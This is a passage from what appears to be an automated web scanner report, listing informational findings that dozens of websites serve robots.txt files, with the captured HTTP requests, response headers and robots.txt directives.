Date: Wed, 04 May 2011 04:16:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.weightlossdietpills.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1770. http://www.weissresearchissues.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weissresearchissues.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weissresearchissues.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:08:22 GMT
Server: Apache
Last-Modified: Thu, 10 Sep 2009 18:41:56 GMT
Expires: Sat, 14 May 2011 02:08:22 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 101
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Disallow: /Articles
Disallow: /images
Disallow: /Images
Disallow: /img
Disallow: /PDF


27.1771. http://www.wellsfargoadvisorsinfo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wellsfargoadvisorsinfo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wellsfargoadvisorsinfo.com

Response

HTTP/1.1 200 OK
Content-Length: 585
Content-Type: text/plain
Last-Modified: Thu, 09 Dec 2010 17:49:31 GMT
Accept-Ranges: bytes
ETag: "d5bb36fc997cb1:e62"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:21:46 GMT
Connection: close

User-agent: *
Allow: /
Disallow: /offers.aspx?type=midyear
Disallow: /offerFinal.aspx?type=midyear
Disallow: /offers.aspx?type=tax
Disallow: /offerFinal.aspx?type=tax
Disallow: /offers.aspx?type
...[SNIP]...

27.1772. http://www.wendy4.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wendy4.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wendy4.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:45:57 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.17 mod_gzip/1.3.26.1a mod_ssl/2.8.31 OpenSSL/0.9.7e-p1
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=f2585ef845b0cada39735bd3f68c4b07; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.wendy4.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1773. http://www.weplaysports.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weplaysports.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weplaysports.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:59:20 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 29 Mar 2010 16:13:25 GMT
ETag: "8591-eb-caebf340"
Accept-Ranges: bytes
Content-Length: 235
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-local/
Disallow: /closeouts/
Disallow: /cart/
    Disallow: /cart2/
    Disallow: /cart3/
    Disallow: /xcart/
    Disallow: /store/
Disallow: /inc/
Disa
...[SNIP]...

27.1774. http://www.westchestermagazine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.westchestermagazine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.westchestermagazine.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:33:37 GMT
Server: Apache
Last-Modified: Thu, 15 May 2008 22:55:31 GMT
ETag: "6fa01ec-1c-cb545ec0"
Accept-Ranges: bytes
Content-Length: 28
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

27.1775. http://www.westga.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.westga.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.westga.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:00 GMT
Server: Apache
Last-Modified: Sun, 10 Oct 2010 16:48:07 GMT
ETag: "184a8-1f-4924602184ae1"
Accept-Ranges: bytes
Content-Length: 31
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /irp/*

27.1776. http://www.westhost.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.westhost.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.westhost.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:07:35 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 25 Aug 2010 17:57:04 GMT
ETag: "186c063-d57-9bf53c00"
Accept-Ranges: bytes
Content-Length: 3415
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# Default /robots.txt File for WestHost Corporate Site

User-agent: Alexibot
User-agent: Aqua_Products
User-agent: asterias
User-agent: b2w/0.1
User-agent: BackDoorBot/1.0
User-agent: Blow
...[SNIP]...

27.1777. http://www.westonsupply.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.westonsupply.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.westonsupply.com

Response

HTTP/1.1 200 OK
Content-Length: 68
Content-Type: text/plain
Last-Modified: Tue, 17 Mar 2009 15:33:48 GMT
Accept-Ranges: bytes
ETag: "a5c0f2c315a7c91:9a2d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:09:49 GMT
Connection: close

# robots.txt for search engines

User-agent:*
Disallow: /cgi-bin/

27.1778. http://www.wgar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wgar.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wgar.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
Content-Length: 275
X-Varnish: 4241323867
X-Cache-Server: varnish03
Expires: Wed, 04 May 2011 03:55:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 03:55:08 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...

27.1779. http://www.wham1180.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wham1180.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wham1180.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
Content-Length: 275
X-Varnish: 4241605579 4241517468
X-Cache-Server: varnish03
Expires: Wed, 04 May 2011 04:07:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 04:07:14 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...

27.1780. http://www.wharfyouth.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wharfyouth.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wharfyouth.org

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 04:00:57 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.14
Expires: Wed, 27 Apr 2011 04:00:56 GMT
Last-Modified: Wed, 04 May 2011 04:00:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://wharfyouth.org/xmlrpc.php
Content-Type: text/plain; charset=utf-8
Content-Length: 23

User-agent: *
Disallow:

27.1781. http://www.whatthetech.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whatthetech.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.whatthetech.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:26:58 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "205-4c2ab5ac-0"
Last-Modified: Wed, 30 Jun 2010 03:10:36 GMT
Content-Type: text/plain
Content-Length: 517

Sitemap: http://www.whatthetech.com/forums/sitemap_index.xml.gz
Sitemap: http://www.whatthetech.com/sitemap.xml.gz

User-agent: Mediapartners-Google*
Disallow:
User-agent: *

Disallow: /forum/vbulleti
...[SNIP]...

27.1782. http://www.wheel-visualizer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wheel-visualizer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wheel-visualizer.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Content-Location: http://www.wheel-visualizer.com/robots.txt
Last-Modified: Tue, 14 Sep 2004 22:38:02 GMT
Accept-Ranges: bytes
ETag: "0412a7eab9ac41:e71"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:17:01 GMT
Connection: close

User-agent: *
Disallow: /

27.1783. http://www.whfoods.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whfoods.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.whfoods.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:59:38 GMT
Server: Apache/2.2.16 (Amazon)
Last-Modified: Mon, 24 Aug 2009 11:52:13 GMT
ETag: "fc454-e0-471e1d93bd540"
Accept-Ranges: bytes
Content-Length: 224
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /bulletins/
Disallow: /classes/
Disallow: /dev/
Disallow: /images/
Disallow: /recipeimages/
Disallow: /preptipimages/
Disallow: /styles/
Disallow: /templates/
Disallow: /media/
...[SNIP]...

27.1784. http://www.whiteblaze.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whiteblaze.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.whiteblaze.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:42:35 GMT
Server: Apache
Last-Modified: Sun, 10 Feb 2008 21:17:17 GMT
Accept-Ranges: bytes
Content-Length: 1032
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /forums/ajax.php
Disallow: /forums/attachment.php
Disallow: /forums/calendar.php
Disallow: /forums/cron.php
Disallow: /forums/editpost.php
Disallow: /forums/global.php
Disallow
...[SNIP]...

27.1785. http://www.whitepages.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitepages.ca
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.whitepages.ca

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/plain; charset=utf-8
Date: Wed, 04 May 2011 03:16:57 GMT
Status: 200 OK
X-Runtime: 0.01181
ETag: "e07fc6e4fda5fecfc9fa7ca8e32fa5ce"
Connection: close
Set-Cookie: wp_endemic_provider=B; domain=.whitepages.ca; path=/; expires=Wed, 04 May 2011 15:16:57 GMT
Set-Cookie: wp_perm=pid%3D-FG5NHX8EeC2jwAbeM-_3A; domain=.whitepages.ca; path=/; expires=Thu, 03 May 2012 03:16:57 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.whitepages.ca; path=/; expires=Thu, 03 May 2012 03:16:57 GMT
Set-Cookie: _wpn_sid=41ffe27fa2f2d19881988cc9414ae58c; domain=.whitepages.ca; path=/
Content-Length: 1110

User-agent: *
Disallow: /dir/*/*/*/
Disallow: /dir*?
Disallow: /*search/Replay
Disallow: /*search/FindAreacode
Disallow: /*search/ReverseAreacode
Disallow: /*search/FindZip
Disallow: /*search/ReverseZ
...[SNIP]...

27.1786. http://www.wholesalecostumeclub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wholesalecostumeclub.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wholesalecostumeclub.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:23:55 GMT
Server: Apache
ETag: W/"336-1298479893000"
Last-Modified: Wed, 23 Feb 2011 16:51:33 GMT
Content-Length: 336
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /
Disallow: /jsp/shop.jsp
Disallow: /jsp/
Disallow: /girls+costumes/
Disallow: /boys+costumes/
Disallow: /womens+costumes/
Disallow: /mens+costumes/
Disallow: /infant+todd
...[SNIP]...

27.1787. http://www.wholesalefashionsquare.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wholesalefashionsquare.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wholesalefashionsquare.com

Response

HTTP/1.1 200 OK
Content-Length: 68
Content-Type: text/plain
Last-Modified: Tue, 24 Aug 2010 04:25:03 GMT
Accept-Ranges: bytes
ETag: "86b06f524443cb1:235a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:31:35 GMT
Connection: close

# robots.txt for search engines

User-agent:*
Disallow: /cgi-bin/

27.1788. http://www.whozzle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whozzle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.whozzle.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:50:48 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 10 Sep 2010 01:56:58 GMT
ETag: "4e350c58-2ef-48fde0fd56e80"
Accept-Ranges: bytes
Content-Length: 751
Cache-Control: max-age=315360000
Expires: Sat, 01 May 2021 01:50:48 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

###############################
#
#
User-agent: *
Disallow: none
# list folders robots are not allowed to index
#
SiteMap: http://www.whozzle.com/siteindex1.xml
SiteMap: http://www.whozzle.co
...[SNIP]...

27.1789. http://www.wideo.fr/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wideo.fr
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wideo.fr

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "57997"
Last-Modified: Tue, 27 Nov 2007 09:14:38 GMT
Content-Length: 95
Connection: close
Date: Wed, 04 May 2011 01:11:54 GMT
Server: lighttpd

User-agent: *

Disallow: /tos/
Disallow: /contact/
Disallow: /upload/
Disallow: /register/

27.1790. http://www.widescreengamingforum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.widescreengamingforum.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.widescreengamingforum.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:54:40 GMT
Server: Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Mon, 01 Mar 2010 02:22:52 GMT
ETag: "233"
Accept-Ranges: bytes
Content-Length: 563
Cache-Control: max-age=31536000
Expires: Thu, 03 May 2012 03:54:40 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

###############################
#
# sample robots.txt file for this website
#
# addresses all robots by using wild card *
#
User-agent: *
# list folders robots are not allowed to index
#
Disallow: /p
...[SNIP]...

27.1791. http://www.wildaboutmovies.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wildaboutmovies.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wildaboutmovies.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:04:58 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 10 Mar 2011 23:03:00 GMT
ETag: "15d8ab8-55e-49e28d8cc7100"
Accept-Ranges: bytes
Content-Length: 1374
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/
Disallow: /DVD-Reviews/_baks/
Disallow: *.csi
Disallow: /movies/2008-2010MoviesInTheaters.php
Disallow: /DVD-Review
...[SNIP]...

27.1792. http://www.williams.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.williams.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.williams.edu

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:53:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-pl1-gentoo
X-Pingback: http://www.williams.edu/xmlrpc.php
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8
Set-Cookie: NSC_wt_xxx_iuuq=c7f63a403660;path=/

User-agent: *
Disallow:

27.1793. http://www.win7heads.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.win7heads.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.win7heads.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:02:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
Last-Modified: Fri, 02 Apr 2010 23:32:20 GMT
ETag: "28822a-1b-4834963f9a900"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /


27.1794. http://www.wincalendar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wincalendar.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wincalendar.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:53:21 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 06 Dec 2010 07:21:49 GMT
ETag: "39d85b0-63-bdc81d40"
Accept-Ranges: bytes
Content-Length: 99
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /January-Calendar/new.html

Sitemap:http://www.wincalendar.com/sitemap.xml

27.1795. http://www.windows-vista-update.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.windows-vista-update.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.windows-vista-update.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:45:18 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.windows-vista-update.com/QMmh9mi8.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow:
...[SNIP]...

27.1796. http://www.windowsreinstall.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.windowsreinstall.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.windowsreinstall.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:45:34 GMT
Server: Apache
Last-Modified: Tue, 12 Sep 2006 14:49:42 GMT
ETag: "18044496-dd-4506c906"
Accept-Ranges: bytes
Content-Length: 221
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /member/
Disallow: /images/
Disallow: /logs/
Disallow: /memberdownload/
Disallow: /membersignup/
Disallow: /pm/
Disallow: /Affiliates/
Disallow: /casino/
Disallow: /install/oem
...[SNIP]...

27.1797. http://www.wine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wine.com

Response

HTTP/1.1 200 OK
ETag: "0105cb560cfca1:26a"
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
Accept-Ranges: bytes
Content-Length: 290
Date: Tue, 03 May 2011 23:57:47 GMT
Connection: close
Last-Modified: Mon, 29 Mar 2010 16:56:00 GMT
X-Strangeloop: RCache
Server: Microsoft-IIS/6.0
X-SL-RCache: Cached
X-Powered-By: ASP.NET
Content-Type: text/plain

User-agent: *
Disallow: /account/
Disallow: /checkout/
Disallow: /promos/
Disallow: /areweup/
Disallow: /v6/search/


User-agent: googlebot
Disallow: /account/
Disallow: /checkout/
Disallow
...[SNIP]...

27.1798. http://www.winecountry.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winecountry.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.winecountry.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:39:32 GMT
Server: Apache
Last-Modified: Fri, 14 May 2010 04:31:02 GMT
ETag: "10ca00e-187-57b40d80"
Accept-Ranges: bytes
Content-Length: 391
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# We don't want the data downloads being indexed by search engines because it
# would just cause confusion in search results

User-agent: *
Disallow: /perl/wikipedia_cities.cgi
Disallow: /cgi-bin/ubb/
...[SNIP]...

27.1799. http://www.wingstuff.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wingstuff.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wingstuff.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:38:27 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 01 Jun 2009 22:06:37 GMT
ETag: "3cf8b9a-c8-a3d45540"
Accept-Ranges: bytes
Content-Length: 200
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=604800
Expires: Wed, 11 May 2011 03:38:27 GMT
Vary: Accept-Encoding
Connection: close

User-agent: ia_archiver
Disallow: /
User-Agent: *
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /includes/
User-agent: Googlebot-Image
Disallow: /
User-agent Googlebot
Disallow: /images/

27.1800. http://www.winhelponline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winhelponline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.winhelponline.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:23:27 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 31 Mar 2009 12:55:38 GMT
ETag: "b81770-298-b732c680"
Accept-Ranges: bytes
Content-Length: 664
Cache-Control: max-age=0
Expires: Wed, 04 May 2011 03:23:27 GMT
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /articlerss
Disallow: /blogrss
Disallow: /tmp
Disallow: /attachments
Disallow: /cache
Disallow: /newsrss
Disallow: /newsrss.php
Disallow: /blogrss.php
Disallow: /articlerss.php
...[SNIP]...

27.1801. http://www.wiscnews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wiscnews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wiscnews.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=900
X-TNCMS-Memory-Usage: 2110100
Content-Type: text/plain; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 03:16:52 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0375
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: wiscnews.com
X-TNCMS-Served-By: cmsapp12
Content-Length: 1677

User-agent: MSNBot
Crawl-delay: 3
Disallow: /content/tncms/live/
Disallow: /content/tncms/ads/
Disallow: /search/?
Disallow: /*?mode=print
Disallow: /*?print
Disallow: /*?mode=story
Disallow:
...[SNIP]...

27.1802. http://www.wishuponahero.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wishuponahero.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wishuponahero.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:59:06 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 16:10:43 GMT
ETag: "19a8359-f6-49f3cb82306c0"
Accept-Ranges: bytes
Content-Length: 246
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Mediapartners-Google
Disallow: /members/compose
Disallow: /members/certinfo
Disallow: /members/myinfo
User-agent: *
Disallow: /members
Disallow: /forget
Disallow: /js
Disallow: /ma
...[SNIP]...

27.1803. http://www.wizardcoinsupply.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wizardcoinsupply.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wizardcoinsupply.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:50:34 GMT
Server: Apache
Last-Modified: Mon, 11 Feb 2008 00:54:50 GMT
Accept-Ranges: bytes
Content-Length: 437
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /*printable=Y
Disallow: /*js=*
Disallow: /*sort=*
Disallow: /product.php*
Disallow: /home.php?cat=*
Disallow: /catalog/
Disallow: /search.php
Disallow: /cart.php
Disallow: /hel
...[SNIP]...

27.1804. http://www.wmagazine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wmagazine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wmagazine.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "11d2f0aab05571cc2760ed5fe5ef190a:1218729940"
Last-Modified: Thu, 14 Aug 2008 16:05:40 GMT
Accept-Ranges: bytes
Content-Length: 180
Content-Type: text/plain
Date: Wed, 04 May 2011 02:09:31 GMT
Connection: close
X-N: S

#disallow /user/ as there are incoming links going to pages within the /user/ directory that can't be accessed.
User-agent: *
Disallow: /user/
Disallow: /ontheweb/blogs/delineator

27.1805. http://www.wofford.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wofford.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wofford.edu

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 28 Nov 2007 20:59:38 GMT
Accept-Ranges: bytes
ETag: "0d96a96132c81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:30:34 GMT
Connection: close
Content-Length: 821

User-agent: *
Disallow: /1998/
Disallow: /admin/
Disallow: /arboretumorig/
Disallow: /App_WebReferences/
Disallow: /App_Themes/
Disallow: /App_Code/
Disallow: /aspnet_client/
Disallow: /AssetM
...[SNIP]...

27.1806. http://www.woio.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.woio.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.woio.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS31
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:a0e"
